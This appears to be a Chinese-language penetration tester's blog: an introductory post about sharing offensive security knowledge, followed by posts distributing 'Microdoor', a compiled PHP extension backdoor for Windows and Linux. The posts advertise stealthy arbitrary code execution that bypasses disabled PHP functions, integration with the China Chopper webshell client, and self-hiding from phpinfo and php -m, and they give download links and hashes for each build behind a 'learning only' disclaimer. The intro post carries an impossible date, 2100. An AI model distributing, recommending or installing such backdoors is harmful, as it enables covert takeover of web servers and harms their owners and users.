2100年12月29日星期三

为什么会有这个博客

渗透攻击超十年,由于年龄,身体原因,自己感觉快要退出一线渗透攻击了。遂打算把毕生所学用文字表写出来。因为文章涉及到敏感的攻击行为,所以好多需要打马赛克,或者是本地以demo的形式表现出来。当这个行业做久了,你也终有一天发现原来事物的本质是如此重要。比如内网渗透的本质是信息搜集。当年某大佬把这条经验传递给我,同样,今天变成老家伙的我,也希望把这条经验传递下去。
文中一定会出现笔误或者不对的地方,请大家多多包涵,提前向各位说声对不起,所有课程从基础开始(包括工具的介绍,应用等),这样以后新来的同学或者想要自我从头学习的同学也可以避开一些弯路,在写的过程中,我深深体会到分享者才是学习中的最大受益者,由于需要成文章,所以需要查阅大量的资料。在整个过程中,又学习到很多知识点。连载其中包括穿插在工作中的项目心得笔记,包括但不限制于代码审计,web渗透,内网渗透,域渗透,隧道介绍,日志溯源与暴力溯源等。如果有课程指定需求介绍相关技术的同事(在我技术能力范围之内),请发我的邮箱:micropoor@gmail.com,由于博客可能非人为因素被停止更新,本博客所有的文章都转自我的另一个博客https://micropoor.blogspot.com。
在2010-2012年之间一直在写<PHP安全新闻早8点>,但是由于当时的工作原因,就不在写了。我于2011年离开这个圈子,到另一个圈子,于2016年末回归到这个圈子,发现这个圈子的精神变了,或者我跟不上潮流了,或者我掉队了。可能技术一旦与钱挂钩,技术可以快速变现的时候,那么它的味道就会变吧。这次的所有课程无版权,只希望自己可以在本来已封闭的技术氛围里,依然做出一些技术文档输出。那么这次的教程我想依然想叫<PHP安全新闻早8点>



2017-11-17
Micropoor

2018年5月27日星期日

优化更新 php backdoor for windows

所有Microdoor系列仅供学习,通过了解相关原理,来做自身安全与防护。切勿非法使用。

Microdoor for php 作为backdoor,更为隐蔽,所有调用以及代码任意执行,都调用内核函数,php禁用执行函数依然可以执行任意php代码。无缝连接菜刀,以及第三方渗透框架。并且在phpinfo,以及php -m 隐藏自身。旨意通过了解相关原理,做好相关安全防护。

更新支持php 5.4.x for windows
更新php-5.6.36 for windows 的部分bug。

php-5.6.36 backdoor for windows

micropoor_php5.6.x_x86.dll
SIZE: 188416 字节 MD5: 1EEF918B0D873316D39117F62C6A4819 SHA1: 944EFD5DB064FF412D1D7874FEC719F14382E2F1 CRC32: F9D03401
备注:micropoor_php5.6.x_x86.dll仅适用x32位php-5.6.36 for Windows 的Microdoor。不适用其他版本。
为防止原文件被篡改,使用前,请对比文件MD5值。
https://drive.google.com/file/d/19aJIIBKyTItUWkizGdupWJnHy7eUvrUC/view



php-5.4.x backdoor for windows

micropoor_php5.4.x_x86.dll
SIZE: 68608 字节 MD5: 457A72A45CBD06D8F4ECAB2C6A8B7426 SHA1: D922C4A9C79FB250F2BD0F426BD5124C38C9716E CRC32: 560188D7
备注:micropoor_php5.4.x_x86.dll仅适用x32位micropoor_php5.4.x_x86.dll for Windows 的Microdoor。不适用其他版本。
为防止原文件被篡改,使用前,请对比文件MD5值。
https://drive.google.com/file/d/1bIT9LSyeXxJa4qxKBYjPro784DEr3swG/view



2018年5月11日星期五

PHP all kernel versions for backdoor

所有Microdoor系列仅供学习,通过了解相关原理,来做自身安全与防护。切勿非法使用。

Microdoor for php 作为backdoor,更为隐蔽,所有调用以及代码任意执行,都调用内核函数,php禁用执行函数依然可以执行任意php代码。无缝连接菜刀,以及第三方渗透框架。并且在phpinfo,以及php -m 隐藏自身。旨意通过了解相关原理,做好相关安全防护。

How to install?






php5.x x64 backdoor for linux
public_x64.so
Size: 26800 bytes
MD5: 1C21BD02D26E9A3914A9A7248B799715
SHA1: 934D577EDBCBC6FEB93AA52DE2C195BE59269B77
CRC32: 8145921D
备注:public_x64.so仅适用x64位php5.x for Linux 的Microdoor。不适用其他版本。
为防止原文件被篡改,使用前,请对比文件MD5值。
https://drive.google.com/file/d/1qDYcGuODAUOWF8rKGw4okQ34TyBK9vBh/view?usp=sharing
php5.x x32 backdoor for linux
public_x32.so
Size: 26127 bytes
MD5: 9BF67665FDCB30C355358624DBEB79BB
SHA1: 3E996D33F18C1E34600203E8C348988449865888
CRC32: 54264834
备注:public_x32.so仅适用x32位 php5.x for Linux的Microdoor。不适用其他版本。
为防止原文件被篡改,使用前,请对比文件MD5值。
https://drive.google.com/file/d/1hF0ZRlz7qZCrWShPNSIumIhlR-pjAx34/view?usp=sharing
php5.x x32 backdoor for windows
public_x86.dll
Size: 68608 bytes
MD5: F5FAF58A15ADC9946A3C34220653DB21
SHA1: 70CA2B9F7ACDADDE0A8A20702EAA897B8EEB43E2
CRC32: 306CDD73
备注:public_x86.dll仅适用x32位php5.x for Windows 的Microdoor。不适用其他版本。
为防止原文件被篡改,使用前,请对比文件MD5值。
https://drive.google.com/file/d/1b_TYaV2gfM6_iJLNx-61qQRUskwwh4dR/view?usp=sharing
PHP7.X x32 for linux
public_x32_7.x.so
Size: 40188 字节
MD5: 472BBC6A3673D7C0C234A5494FDF0A92
SHA1: BCB760BDEB34972E540121591E95866AED78066E
CRC32: 9F17393A
备注:public_x32_7.x.so仅适用x32位 php7.x for Linux的Microdoor。不适用其他版本。
为防止原文件被篡改,使用前,请对比文件MD5值。
https://drive.google.com/file/d/1UJYyKTZ-LZpSUvmRq_Gg3oI_Sn0Q8YZN/view
PHP7.X x64 for linux
public_x64_7.x.so
Size: 42000 字节
MD5: B5370B1C04C5D6E7A3586BFF262BAF19
SHA1: A1F58D3A7DA18C1184CA3C1CD225D5D353231FC0
CRC32: A4BA02C1
备注:public_x64_7.x.so仅适用x64位 php7.x for Linux的Microdoor。不适用其他版本。
为防止原文件被篡改,使用前,请对比文件MD5值。
https://drive.google.com/file/d/1WkQInZQ53PHe104MKHqFOG_-ydCZh4lN/view




注:部分windows dll版,如果有需求的话,未来编译发布。